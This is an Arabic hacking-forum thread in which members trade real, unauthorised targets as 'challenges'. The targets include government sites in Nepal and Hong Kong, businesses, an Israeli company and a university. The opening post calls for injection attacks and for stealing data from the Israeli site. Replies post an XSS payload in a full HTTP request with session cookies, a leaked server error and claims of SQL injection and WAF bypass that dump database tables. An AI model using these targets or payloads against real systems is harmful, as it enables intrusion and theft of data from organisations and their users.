اختراق مواقع

[BEN10]

بسم الله والصلاة والسلام على رسول الله

إن شاء الله سوف أُحاول أن أضع لكم تحديات على مواقع حقيقية بعيداً عن شغل CTF.

فيه هنا xss حاول تجيبها: =https://nepal.gov.np:8443/NationalPortal/search?title

نفس الكلام هنا برضو كمان Xss :

https://www.customs.gov.hk/en/search-result/index.html?q=Hello


في هنا SQL حاول تجيبها:

Events and Latest News from Sealink International Berhad

Events and Latest News from Sealink International Berhad

www.asiasealink.com

نفس الكلام SQL :

https://www.macauto.mg/produit.php?cat=2


نفس الكلام SQL:

https://www.shirtable-theshirtmaker.com/pro-detail.php?id=S0120


نفس الكلام SQL (فيه WAF حاول تعديه):

http://www.sfasemicon.com.ph/read.php?id=4


نفس الكلام SQL (فيه WAF حاول تعديه نوعه SUCURI#)

https://dcomponents.com/results.php?cat=2116


هذا موقع إسرائيلي, اسرق الداتا واعمل الي أنت عاوزه (ممكن تأخد أجر لو عملت كدا)

https://www.shatal-israel.co.il/category.asp?id=4200


تحدي سهل phpMyadmin ( ملحوظة لو مش فاهم أنت بتعمل إيه عشان ما تضر الموقع)

https://sketch-studio.net

التقويم الجامعي

zu.edu.jo

التحديات أخذت شوي من على التليجرام شباب مشيراهم وشوية أصلًا في منتدى SPOTER على دارك ويب
عاوزين نشوف الإبداع

ممنوع مشاركة الحل كي نستمر في تخريب العالم​

 

[BEN10]

دا حل تحدي منهم

 

[ITACHI_10HITACHI_10H is verified member.]

فكرة حلوة . تابع أخي

 

[BEN10]

فكرة حلوة . تابع أخي

لو في نتائج حلوه والشباب متحمسه تمام + مش عاوز احط لينكات للمواقع وكان شي لم يحدث عاوزين نحط اللينك من هنا الموقع يجيب شاشه سودا

 

[ExEExE is verified member.]

Fatal error: Uncaught Error: Call to undefined function mysql_error() in /htdocs/produit.php:307 Stack trace: #0 {main} thrown in /htdocs/produit.php on line 307

 

[ExEExE is verified member.]

POST /NationalPortal/search HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://nepal.gov.np:8443/NationalPortal/search?titleCookie: JSESSIONID=4D3E81CB9B301931FAE9F7988130005F; TS010b288c=01f0c014fba522b0d393ea87d73b866e1ad30dd5c0f8152caba8350425816f31d7aeafab37c6785b4b10be9b119dca71f1878b6ade; JSESSIONID=2F68D905FF81457BD228DB0B0992C33B; TS01476388=01f0c014fbc48a671713024d00acf2bc8f5afed681f8152caba8350425816f31d7aeafab3709e6ae69b82d53b0f57746fb29bd056e3cccea520443637b9b370c4ffc46553e; jss_selected=style; color=invertedContent-Length: 61Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: nepal.gov.np:8443Connection: Keep-alivepageNo=1&title=e'"()%26%25<zzz><ScRiPt%20>bMYP(9419)</ScRiPt>

 

[BEN10]

POST /NationalPortal/search HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://nepal.gov.np:8443/NationalPortal/search?titleCookie: JSESSIONID=4D3E81CB9B301931FAE9F7988130005F; TS010b288c=01f0c014fba522b0d393ea87d73b866e1ad30dd5c0f8152caba8350425816f31d7aeafab37c6785b4b10be9b119dca71f1878b6ade; JSESSIONID=2F68D905FF81457BD228DB0B0992C33B; TS01476388=01f0c014fbc48a671713024d00acf2bc8f5afed681f8152caba8350425816f31d7aeafab3709e6ae69b82d53b0f57746fb29bd056e3cccea520443637b9b370c4ffc46553e; jss_selected=style; color=invertedContent-Length: 61Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: nepal.gov.np:8443Connection: Keep-alivepageNo=1&title=e'"()%26%25<zzz><ScRiPt%20>bMYP(9419)</ScRiPt>

ابعت صور للحل فيس كومنت منغير البايلود + مش عاوز error انا عاوز الجداول الي موجوده في قاعده البيانات

 

[Sub_Zero]

هذا حل يدويا لتحدي الموقع الذي عليه واف SUCURI# الحل كان مباشرة عبر مواجهة الواف وتخطيه وخداع الواف وبدون إستعمال طريقة جلب الأيبي الحقيقي لإن هاته الطريقة بالتحديات غير مقبولة ولا تنفع مع كل المواقع خاصة مع مواقع Bugbounty
الموقع:

D Components » Designing in Electronic Components

dcomponents.com

POC صورة إثبات الحقن والحل:

 

[Sub_Zero]

حل وحقن الموقع الاسرائيلي يدويا استخراج كل من يوزر القاعدة والاصدار واسم القاعدة مع افراغ كل من ال table و ال column بإستعلام واحد

POC صورة الحل وإثبات الحقن :

 

[Sub_Zero]

حل وحقن sql يدوي سهل جدا وتخطي للموقع الذي عليه واف
اسم الواف Web Application Firewal

الموقع:

Read | SFA Semicon Philippines Corporation

www.sfasemicon.com.ph

POC صورة الحل وإثبات الحقن :